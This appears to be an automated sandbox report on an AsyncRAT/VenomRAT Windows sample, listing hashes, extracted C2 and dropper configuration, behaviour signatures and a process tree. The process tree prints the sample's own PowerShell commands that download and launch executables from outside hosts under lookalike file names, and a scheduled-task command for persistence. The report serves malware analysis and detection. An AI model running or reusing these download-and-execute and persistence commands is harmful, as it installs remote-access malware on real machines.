Overview

overview

10

Static

static

10

35278b63c3...1e.exe

windows7-x64

10

35278b63c3...1e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    130s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    18-08-2024 18:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe

  • Size

    75KB

  • MD5

    29c2e3cf6ffd3a12ff257346d868c54c

  • SHA1

    34494b45a3424e3966db318da27845883a054052

  • SHA256

    35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e

  • SHA512

    41b537ea71f85e4d9d70205647145fc216c2b81eb4951e1518bda2e46e7f6bf31f04ea5ae88ec9b8e1db23e9a8a020c8c429eba722ee460dac7a6e129705a9c1

  • SSDEEP

    1536:gikU7cX0OzCoXPMRkIKt2OlY6H1bf/iQHha5kzkSLVclN:gDUaT9PMRkIv4jH1bfVha5kLBY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

38.153.61.81:16387

Mutex

uxhgglgtkj

Attributes
  • delay

    1

  • install

    true

  • install_file

    system.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 3 IoCs

    Detects VenomRAT.

    rat
  • Async RAT payload 1 IoCs
    rat
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe
    "C:\Users\Admin\AppData\Local\Temp\35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2872
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC65.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:2980
      • C:\Users\Admin\AppData\Roaming\system.exe
        "C:\Users\Admin\AppData\Roaming\system.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2888
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2168
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1556

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmpAC65.tmp.bat
    Filesize

    150B

    MD5

    37de9417c760b45886ed18e59cdad9a2

    SHA1

    dd3952efcc9a8fa3e6901ae32cf094e213d6c0be

    SHA256

    cf93a0dd329b2f98948f45c0049a6786898772fb59caf384f05e8ad567b16325

    SHA512

    32ae5ed0c307c23764f3a43677873f6142c098592349adf5258cc68fe49558b0f7bad324e559cfe00309d3a0f9df65adbd5a1656e3086899f7df971755d66452

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    06ae0cc14c4ee5592fdb9c702cc5d43f

    SHA1

    5755d7d565c8b89255e16d13873731bef6ea8809

    SHA256

    9273d401f1d30436fdd5eeb8e3f3acea07b09e293035bfb9936c2ad6f5244970

    SHA512

    c025dac1eab5c36b3ae12b92996f0618b8617afe65c6bb171a484834c6ee9014594ed2105523cd1433ffeb3bb1f6967531370382494846537d8d474eb9047bfa

    Download Submit

  • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
    Filesize

    8B

    MD5

    cf759e4c5f14fe3eec41b87ed756cea8

    SHA1

    c27c796bb3c2fac929359563676f4ba1ffada1f5

    SHA256

    c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

    SHA512

    c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\system.exe
    Filesize

    75KB

    MD5

    29c2e3cf6ffd3a12ff257346d868c54c

    SHA1

    34494b45a3424e3966db318da27845883a054052

    SHA256

    35278b63c31ea949e5a8f031773022075ba0e15d839498a1a24ea483c9a8621e

    SHA512

    41b537ea71f85e4d9d70205647145fc216c2b81eb4951e1518bda2e46e7f6bf31f04ea5ae88ec9b8e1db23e9a8a020c8c429eba722ee460dac7a6e129705a9c1

    Download Submit

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/2252-30-0x0000000000110000-0x0000000000128000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2268-19-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2268-0-0x000007FEF5A13000-0x000007FEF5A14000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2268-9-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2268-1-0x0000000000EC0000-0x0000000000ED8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2780-28-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2780-29-0x0000000002310000-0x0000000002318000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2860-8-0x0000000002280000-0x0000000002288000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2860-7-0x000000001B1A0000-0x000000001B482000-memory.dmp

    Filesize

    2.9MB

    Download